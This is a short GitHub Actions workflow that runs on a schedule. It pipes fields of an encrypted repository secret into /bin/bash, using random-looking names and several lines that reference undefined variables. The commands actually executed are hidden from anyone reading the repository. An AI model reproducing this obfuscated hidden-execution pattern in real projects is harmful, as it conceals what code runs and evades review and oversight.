name: caidefangzhu
on:
  workflow_dispatch:
  schedule:
    - cron: '16 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caidefangzhu
        env:
          qwnvi78: ${{ secrets.qwnvi78 }}
        run: |
          echo $qwnvi78 | jq -r .vkyx505 | /bin/bash
          echo $r5 | jq -r .tqo1212 | /bin/bash
          echo $vyq1 | jq -r .o277 | /bin/bash
          echo $t1703 | jq -r .uzj04491 | /bin/bash
          echo $j7 | jq -r .b8 | /bin/bash
          echo $hjb2901 | jq -r .isrz143 | /bin/bash
          echo $ry1894 | jq -r .lji491 | /bin/bash
          echo $pwsu0 | jq -r .tuby1668 | /bin/bash
          echo $w24 | jq -r .hgh3 | /bin/bash

